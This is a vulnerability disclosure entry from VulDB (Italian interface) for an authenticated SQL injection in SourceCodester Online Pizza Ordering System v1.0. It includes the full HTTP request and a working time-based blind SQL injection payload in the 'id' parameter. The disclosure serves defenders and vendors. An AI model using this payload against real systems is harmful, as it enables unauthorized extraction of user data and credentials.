Invia #216885: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'informazioni

TitoloSourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'
DescrizioneAffected Software: SourceCodester Online Pizza Ordering System v1.0 https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391 Tested On: Ubuntu Server 22.04.3 LTS Affected URL: http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order Request: POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 5 Origin: http://x.x.x.x Connection: close Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx id=1 Affected Parameter: id Proof of Concept: POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 5 Origin: http://x.x.x.x Connection: close Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE) Impact: SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials. Summary: An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
Utente
 simon.davis8080 (UID 54983)
Sottomissione05/10/2023 10:30 (3 anni fa)
Moderazione05/10/2023 12:01 (2 hours later)
StatoAccettato
Voce VulDB241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order ID iniezione SQL]
Punti17

Interested in the pricing of exploits?

See the underground prices here!